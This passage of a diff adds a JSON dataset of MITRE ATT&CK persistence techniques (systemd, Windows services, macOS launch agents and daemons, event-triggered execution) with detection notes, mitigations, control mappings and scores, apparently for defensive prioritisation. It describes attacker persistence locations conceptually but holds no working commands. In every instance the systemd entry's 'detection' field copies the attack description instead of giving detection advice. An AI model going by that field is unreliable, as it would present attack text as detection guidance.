+                "detection": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
+                "mitigations": [
+                    {
+                        "mid": "M1033",
+                        "name": "Limit Software Installation",
+                        "description": "Block users or groups from installing unapproved software.",
+                        "url": "https://attack.mitre.org/mitigations/M1033"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1543.003",
+                "name": "Create or Modify System Process: Windows Service",
+                "url": "https://attack.mitre.org/techniques/T1543/003",
+                "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). \n\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\n\nAn adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. \n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). ",
+                "detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1543.004",
+                "name": "Create or Modify System Process: Launch Daemon",
+                "url": "https://attack.mitre.org/techniques/T1543/004",
+                "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)",
+                "detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1033",
+                "name": "Limit Software Installation",
+                "description": "Block users or groups from installing unapproved software.",
+                "url": "https://attack.mitre.org/mitigations/M1033"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 1.7666666666666666,
+        "adjusted_score": 1.7666666666666666,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-4",
+            "RA-5",
+            "SA-22",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.5666666666666667,
+            "mitigation_score": 0.6,
+            "detection_score": 0.53
+        },
+        "choke_point_score": 0.2,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1543.001",
+        "name": "Create or Modify System Process: Launch Agent",
+        "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ",
+        "url": "https://attack.mitre.org/techniques/T1543/001",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's  ProgramArguments  key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Service: Service Creation",
+            "Service: Service Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1543",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.2571428571428571,
+        "adjusted_score": 0.2571428571428571,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1543.002",
+        "name": "Create or Modify System Process: Systemd Service",
+        "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
+        "url": "https://attack.mitre.org/techniques/T1543/002",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
+        "platforms": [
+            "Linux"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Service: Service Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1543",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1033",
+                "name": "Limit Software Installation",
+                "description": "Block users or groups from installing unapproved software.",
+                "url": "https://attack.mitre.org/mitigations/M1033"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.36190476190476195,
+        "adjusted_score": 0.36190476190476195,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-11",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SA-22",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1543.003",
+        "name": "Create or Modify System Process: Windows Service",
+        "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). \n\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\n\nAn adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. \n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). ",
+        "url": "https://attack.mitre.org/techniques/T1543/003",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Service: Service Modification",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1543",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.5952380952380952,
+        "adjusted_score": 0.5952380952380952,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1543.004",
+        "name": "Create or Modify System Process: Launch Daemon",
+        "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)",
+        "url": "https://attack.mitre.org/techniques/T1543/004",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Service: Service Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1543",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546",
+        "name": "Event Triggered Execution",
+        "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ",
+        "url": "https://attack.mitre.org/techniques/T1546",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Metadata",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "WMI: WMI Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1546.001",
+                "name": "Event Triggered Execution: Change Default File Association",
+                "url": "https://attack.mitre.org/techniques/T1546/001",
+                "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
+                "detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\n\nUser file association preferences are stored under  [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1546.002",
+                "name": "Event Triggered Execution: Screensaver",
+                "url": "https://attack.mitre.org/techniques/T1546/002",
+                "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\  on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)",
+                "detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.003",
+                "name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription",
+                "url": "https://attack.mitre.org/techniques/T1546/003",
